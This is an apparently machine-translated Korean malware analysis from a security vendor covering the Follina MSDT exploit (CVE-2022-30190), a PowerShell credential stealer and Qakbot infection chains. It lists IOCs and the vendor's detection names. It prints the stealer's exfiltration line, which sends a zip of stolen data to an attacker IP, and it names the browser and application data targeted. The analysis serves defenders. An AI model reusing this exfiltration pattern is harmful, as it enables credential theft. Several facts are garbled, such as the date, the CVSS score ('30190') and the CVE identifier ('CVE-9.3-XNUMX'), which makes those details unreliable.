30년 2022월 2022일, Microsoft Windows 지원 진단 도구(MSDT)에서 심각도가 높은(CVSS:30190) 제로데이 원격 코드 실행 취약점인 CVE-9.3-XNUMX "FOLLINA"가 발견되었습니다.
이 MSDT 도구는 Microsoft Office 문서와 같은 애플리케이션의 문제를 진단합니다. Word 문서와 같은 초기 공격 벡터는 원격 템플릿 기능을 사용하여 HTML 파일을 다운로드한 후, URL 프로토콜을 사용하여 이 진단 도구(MSDT)를 호출하고 악성 코드를 실행합니다. 초기 공격은 Microsoft Word에만 국한되었지만, 최근에는 RTF 및 Outlook까지 공격 벡터가 확대되었습니다.
이 취약점은 실제로 악용되고 있으며, 이 취약점에 성공적으로 영향을 미치는 위협 행위자는 임의 코드를 실행하고 추가 프로그램을 설치할 수 있습니다. 위협 행위자들은 이 취약점을 이용하여 북미와 유럽 전역의 소비자와 산업계에 백도어, AsyncRAT, Quakbot 및 기타 악성코드를 확산시키고 있습니다.
취약점에 대한 자세한 분석:
MSDT 도구를 처음 호출할 때 사용하는 프로그램은 Microsoft Office(Word, Excel, RTF 등)입니다.
그림. 흐름도
아래는 "Employment_Agreement_Template"이라는 RTF 샘플의 예입니다. 이 RTF 문서는 OLE 개체를 사용합니다.
그림. RTF 파일 OLE 개체
이 문서를 열면 다음 메시지가 표시됩니다.
피해자가 "예"를 클릭하면 아래 그림과 같이 내장된 링크 http[:]//45[.]76[.]53[.]253/1.html에서 인코딩된 HTML 파일이 다운로드됩니다.
HTML 문서에는 아래 코드에서 볼 수 있듯이 파일 하단에 주석으로 처리된 "A" 문자가 포함되어 있습니다.
그림. HTML 파일에 인코딩된 데이터
HTML 파일에 포함된 코드는 PowerShell 구문을 포함하는 IT_BrowseForFile 매개변수와 함께 ms-msdt를 사용하여 PCWDiagnostic을 호출합니다. base64로 인코딩된 데이터의 디코딩된 부분은 다음과 같습니다.
그림. 디코딩된 데이터
이 코드는 실행 중인 msdt.exe를 중지하고 URL "hXXps [:]//seller-notification [.]live/Zgfbe234dg"에 연결하여 POWERSHELL 스크립트를 다운로드합니다.
Follina 익스플로잇은 배포에 사용되었습니다. PowerShell 기반 Stealer. 내용을 더 자세히 살펴보겠습니다.
그림. 스크립트 내용 1부
이 스크립트는 Appdata/Roaming 내부를 열거하고 Firefox, Opera, Yandex, Vivaldi, CentBrowser, Comodo, Chedot, Orbitum, Chromium, Slimjet, Xvast, Kinza, Iridium, CocCoc, AVAST Software, Chrome, Outlook, Thunderbird, NetSarang, Windows Live, FileZilla, MobaXterm, WeChat 등의 애플리케이션의 로그인 데이터, 쿠키 등을 훔치려고 시도합니다.
도둑은 다음 애플리케이션과 관련된 정보를 훔치기 위해 레지스트리를 쿼리합니다: Autodesk, MobaXterm, Oray SunLogin RemoteClient, MailMaster, Navicat, WinSCP, Microsoft Office, FTP, RAdmin 등.
그림. 스크립트 내용 2부
이 외에도 기계와 관련된 정보도 수집합니다.
- Systeminfo(호스트 이름, OS 관련 정보, 소유자, BIOS 정보, 등록 소유자 포함)
제품 ID, 원래 설치 날짜, 시스템 부팅 시간, 시스템 제조업체, 시스템 모델, 시스템 유형, 프로세서, BIOS 버전, 시스템 로케일, 시간대, 총 물리적 메모리, 도메인, 로그온 서버 등) - IP 구성(Ipconfig를 통해)
- 워크스테이션 구성
- 사용자 계정 정보
- 로컬 그룹 관리자
- 제품 이름 버전
.zip 파일이 %temp%에 생성되어 URL로 전송됩니다.
$http_url = “hxxp://45[.]77.156[.]179:443/” + $ip + “———-” + $time1 + “.zip”
$time1은 다음에 의해 계산된 에포크 타임스탬프입니다.
이는 가상화 검사 역할도 합니다.
Quakbot의 또 다른 예를 살펴보겠습니다.
악성 HTML 첨부 파일과 다운로드 아카이브 파일(.img)(ed63c189b52e4eb663598dc0c3121e05)이 포함된 피싱 이메일입니다. 이 아카이브에는 .lnk(76390978f26d3c6d7f799257542796ce), qbot 페이로드(a14d48974eab6839b1238f984b3c28d2) 및 doc 파일(e7015438268464cedad98b1544d643ad)이 포함되어 있습니다.
그림. 흐름도
zip 파일의 qbot 페이로드는 .lnk 파일을 통해 실행되고, .doc 파일은 HTML 파일을 다운로드합니다. 이 .html 파일은 Follina를 악용하여 또 다른 .qbot 페이로드를 다운로드합니다.
여기 HTML 파일은 http[:]//185[.]234[.]247[.]119에서 다운로드되었으며 다음 그림에 표시된 데이터를 포함합니다.
그림. HTML 파일 데이터
이 HTML은 위의 URL에 연결하고 Quakbot dll(ce86511634b5420332eb6267c0e2ae2e)을 다운로드한 다음 regsvr32.exe를 통해 실행합니다.
분석:
이 quakbot 파일은 RCDATA 내의 .rsrc 섹션에 암호화된 데이터를 포함하는 델파이 컴파일 파일이며, 가상으로 할당된 메모리에서 복호화됩니다. 아래 그림은 암호화된 데이터와 복호화 루프를 보여줍니다.
그림. 암호화된 데이터
그림 설명 루프
이것은 API로 해독되고 1st 스테이지 PE 파일
이제 DLL 삽입을 담당하는 1단계로 넘어가 Quakbot 페이로드를 메모리에 로드합니다. 암호화된 문자열에 대한 RC4 복호화가 수행되어 AV 관련 프로세스 등 프로세스 목록이 표시됩니다. 실행 중인 프로세스가 발견되면 페이로드가 종료됩니다. 아래 그림에서 프로세스가 검사되는 모습을 확인할 수 있습니다.
검사 중인 프로세스 목록은 다음과 같습니다.
나중에 "onedrivesetup.exe"에서 프로세스 주입을 수행합니다.
Qbot은 "obama186" 캠페인과 관련이 있습니다. 아래 이미지는 "onedrivesetup.exe"에서 C2 연결을 보여줍니다.
바이패스 기술:
공격자들이 탐지를 우회하기 위해 초기 공격 벡터에서 인코딩 방식을 사용하는 것을 확인했습니다. 다음 예시는 이를 잘 보여줍니다.
그림. 예시 번호 1
그림. 예시 번호 2
결론 :
최근 가장 심각한 제로데이 중 하나입니다. 이 CVE는 여러 우회 기법을 사용했으며, 수정 방법이 없고 쉽게 악용될 수 있습니다. Microsoft에서 보안 패치를 배포하면 사용자는 즉시 수정해야 합니다. 그 전까지는 조직에 주의를 기울이고 아래의 완화 조치를 따라 공격 표면과 잠재적 피해를 최소화할 것을 권고합니다.
'폴리나'를 치료하려면 다음 권고 사항을 따르세요.
Quick Heal은 고객을 어떻게 보호합니까?
Quick Heal 제품의 기존 고급 보호 기술은 고객을 Follina로부터 보호합니다.
저희 행동 기술에는 Follina에 대한 "CVE_2022_30190_Follina"라는 탐지가 있습니다. 마찬가지로 Seqrite Hawk Hunt 제품에는 "CVE_XNUMX_XNUMX_Follina"라는 정책이 있습니다. “QHIR_CVE_2022_30190_폴리나” 이 공격을 식별하려면.
Follina에 대한 파일 기반 및 네트워크 기반 탐지 내용은 다음과 같습니다.
1. 파일 기반:
- 백도어.튜리안.S28183972
- 트로이 목마.Qbot.S28211728
- CVE-2022-30190.46655
- CVE-2022-30190.46638
- CVE-2022-30190.46635
- CVE-2022-30190.46624
2. 네트워크 기반:
- CVE-2022-30190.RCE!46674
- CVE-2022-30190.RCE!46675
주제 전문가
테하스위니 산다폴라
암루타 와그
